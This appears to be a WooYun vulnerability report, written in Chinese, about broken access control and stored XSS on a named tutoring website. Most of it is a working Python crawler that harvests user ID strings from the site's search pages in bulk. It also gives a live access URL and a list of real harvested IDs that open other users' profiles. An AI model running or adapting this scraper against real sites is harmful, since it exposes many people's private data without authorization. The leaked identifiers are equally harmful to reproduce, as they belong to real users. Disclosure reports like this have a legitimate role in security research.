当前位置:WooYun >> 漏洞信息

漏洞概要 关注数(24) 关注此漏洞

缺陷编号:wooyun-2015-0145626

漏洞标题:某家教网越权访问+存储型XSS漏洞

相关厂商:家教在线

漏洞作者: 二愣子

提交时间:2015-10-11 12:13

修复时间:2015-11-25 12:14

公开时间:2015-11-25 12:14

漏洞类型:未授权访问/权限绕过

危害等级:高

自评Rank:20

漏洞状态:未联系到厂商或者厂商积极忽略

漏洞来源: http://www.wooyun.org,如有疑问或需要帮助请联系 [email protected]

Tags标签:

4人收藏 收藏
分享漏洞:


漏洞详情

披露状态:

2015-10-11: 积极联系厂商并且等待厂商认领中,细节不对外公开
2015-11-25: 厂商已经主动忽略漏洞,细节向公众公开

简要描述:

Hoping you take that jump
But don't fear the fall

详细说明:

越权访问:
http://main.jiajiaozaixian.com/bussinesstudentuserinfo/turnUsercenterStudentUserinfo.action?type=02&idstr=660D52A5075A9768261DA8AA8A879B7A
idstr与用户的ID有关,这里可以在网站中获取。写了个爬虫,爬了几万的数据就没爬了

#! /usr/bin/env python
#coding=utf-8
'''
Author: kevin
Date: 2015/7/13
thread: mul
'''
import time
import sys
import requests
import BeautifulSoup
import tablib
import threading
import Queue
info_list = []

def codeSet():
if(sys.getdefaultencoding()=='ascii'):
reload(sys)
sys.setdefaultencoding('utf-8')

def crawl(queue):
global info_list
while True:
if queue.empty() == True:
break
url = queue.get()
headers = {"User-Agent":"Mozilla/5.0 (Windows NT 6.1; WOW64; rv:39.0) Gecko/20100101 Firefox/39.0"}
try:
res = requests.get(url,headers=headers,timeout=20)
res.raise_for_status()
html = res.text
soup = BeautifulSoup.BeautifulSoup(html) #默认编码就是utf-8
crawlList = []
dataInfo = soup.findAll(attrs={"target":"_blank"})
for i in range(len(dataInfo)):
idstr = dataInfo[i].attrs[0][1]
info_list.append(idstr+'\r\n')

sys.stdout.write(threading.current_thread().getName()+"\r\n")
sys.stdout.flush()
except Exception,ex:
print Exception,ex
queue.task_done()
#time.sleep(1) #########~~~~~~
def dataSave(info_list):
try:
with open('res.txt','w') as f:
f.writelines(info_list)
except Exception,err:
print err
def main():
print threading.current_thread().getName()
codeSet() #Default code is ascii not unicode
threads =[]
raw_url = 'http://main.jiajiaozaixian.com/searchGaojiUserinfo.action?pagelimit=no&renyuanSearchType=01&sortContent=&isGoldAsc=&filterContent=&turnPage=Y&direction=&page='
for i in xrange(3000):
print i
url = raw_url+str(i)
queue.put(url,block=True,timeout=None)

for i in range(10):
print str(i)
t = threading.Thread(target=crawl,args=(queue,))
threads.append(t)

for i in range(len(threads)):

#threads[i].join()
#threads[i].setDaemon(True)
threads[i].start()
#threads[i].join()
for i in range(len(threads)):
threads[i].join()

dataSave(info_list)

end_time = time.time()
print "Elapse time is %s"%(end_time-start_time)
if __name__ == '__main__':

queue = Queue.Queue(3000)
start_time = time.time()
main()


存储型XSS漏洞:

1.png


漏洞证明:

1、只爬了几万数据,下面列一些

http://main.jiajiaozaixian.com/bussinesstudentuserinfo/turnUsercenterStudentUserinfo.action?type=02&idstr=660D52A5075A9768261DA8AA8A879B7A
00023D4CF12865DA0411BEC747896F87
0003227AC99DBC5BD94722FB53197B90
00040936BA32B69BE6A5FD11EB44E6A7
0005F1BE3D810C99CCD5A3BC8E11708D
0007C9D8D6583415F630832C68E6A2DB
0009E462C1830FE660D68C824AB7100E
000ABCC0A64A15973B16717AF08E2822
000B0F89053CFD4A5C1565C93287A7B0
001386FE543963EF35C2042B4CABD37C
0018BDD4E9285F78E7E018C761079EE5
0019E13156F1A1811504FC284D45F131
0019F8BF48DA6A83D601512D9C0E2C2F
001BA6F7A99822E94F34E028627B50D5
001EF182B312229570CAFEF7FF4C4B9C
001F5F3FCC749894CD06FE4FF7CECF83
00201D10B8F59ED0868BE44A45E61490
。。。
。。。


2.png


2、XSS

3.png


4.png

修复方案:

你们更专业

版权声明:转载请注明来源 二愣子@乌云


漏洞回应

厂商回应:

未能联系到厂商或者厂商积极拒绝